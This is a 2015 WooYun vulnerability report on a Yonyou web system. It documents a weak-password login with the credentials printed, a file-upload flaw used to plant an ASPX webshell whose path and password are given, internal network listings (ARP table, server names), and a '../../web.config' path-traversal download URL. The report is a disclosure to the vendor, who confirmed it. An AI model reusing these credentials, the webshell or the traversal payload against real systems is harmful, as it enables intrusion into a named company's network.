当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147290

漏洞标题:用友某系统漏洞打包可威胁内网

相关厂商:用友软件

漏洞作者: 路人甲

提交时间:2015-10-17 17:34

修复时间:2015-12-03 10:32

公开时间:2015-12-03 10:32

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-17: 细节已通知厂商并且等待厂商处理中
2015-10-19: 厂商已经确认,细节仅向厂商公开
2015-10-29: 细节向核心白帽子及相关领域专家公开
2015-11-08: 细节向普通白帽子公开
2015-11-18: 细节向实习白帽子公开
2015-12-03: 细节向公众公开

简要描述:

getshell可威胁内网

详细说明:

目标地址:http://nczx.yonyou.com/SubModule/Login/index.aspx

QQ截图20151016161934.jpg


1#帐号弱口令
帐号:liuni
密码:123456
登录系统后,发现功能还是蛮全的

QQ截图20151016215821.jpg


QQ截图20151016215851.jpg


在项目绿色通道功能处,发现一个上传点
2#任意文件上传

QQ截图20151016215944.jpg


http://nczx.yonyou.com/SubModule/ProjectManage/RemoteTask.aspx?tasktype=2


可直接上传aspx马

QQ截图20151016221038.jpg


上传后的地址经测试发现在

http://nczx.yonyou.com/SubModule/ProjectManage/RemoteTaskAttachs/tmp/62360545liuni/x.aspx


密码:F4ck

QQ截图20151016221219.jpg


QQ截图20151016221821.jpg


接口: 172.16.3.111 --- 0xa  Internet 地址         物理地址              类型  172.16.3.1            c4-ca-d9-36-76-e7     动态          172.16.3.27           00-e0-81-de-0d-90     动态          172.16.3.32           00-1a-4d-20-db-60     动态          172.16.3.54           00-e0-81-b9-4e-00     动态          172.16.3.92           00-1a-4b-de-3d-64     动态          172.16.3.100          00-1b-78-76-d7-96     动态          172.16.3.102          00-1a-4b-de-d5-d4     动态          172.16.3.103          00-11-25-8d-1f-58     动态          172.16.3.104          00-19-21-64-30-ec     动态          172.16.3.151          00-e0-81-d7-6d-6a     动态          172.16.3.155          00-e0-81-d1-ad-89     动态          172.16.3.189          00-e0-81-d0-0d-d9     动态          172.16.3.204          00-15-17-d4-07-fd     动态          172.16.3.255          ff-ff-ff-ff-ff-ff     静态          224.0.0.22            01-00-5e-00-00-16     静态          224.0.0.251           01-00-5e-00-00-fb     静态          224.0.0.252           01-00-5e-00-00-fc     静态          224.0.1.24            01-00-5e-00-01-18     静态          229.111.112.12        01-00-5e-6f-70-0c     静态          232.44.44.233         01-00-5e-2c-2c-e9     静态          239.5.5.5             01-00-5e-05-05-05     静态          239.255.255.250       01-00-5e-7f-ff-fa     静态          255.255.255.255       ff-ff-ff-ff-ff-ff     静态


可内网

QQ截图20151016221922.jpg


漏洞证明:

服务器名称            注解-------------------------------------------------------------------------------\\CYLSERVER                                                                    \\NC-RM                                                                        \\NCSCMSERVER1                                                                 \\R520156                                                                      \\U8DBSERVER0                                                                  \\U8DRP2008                                                                    \\U8JC40                                                                       \\U8MANAGESERVER                                                               \\U8PATCHSRV                                                                   \\U8PATCHSRV2                                                                  \\UF200703040                                                                  \\UF201103043          uf201103043                                             \\UF201103061                                                                  命令成功完成。


QQ截图20151016222004.jpg


3#任意文件下载(需要登录)

http://nczx.yonyou.com/SubModule/ProjectManage/Document/Download.aspx?destFileName=../../web.config


QQ截图20151016222257.jpg


QQ截图20151016222314.jpg

修复方案:

强口令,删除shell,过滤../

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-10-19 10:31

厂商回复:

遗留系统,勿重复提

最新状态:

暂无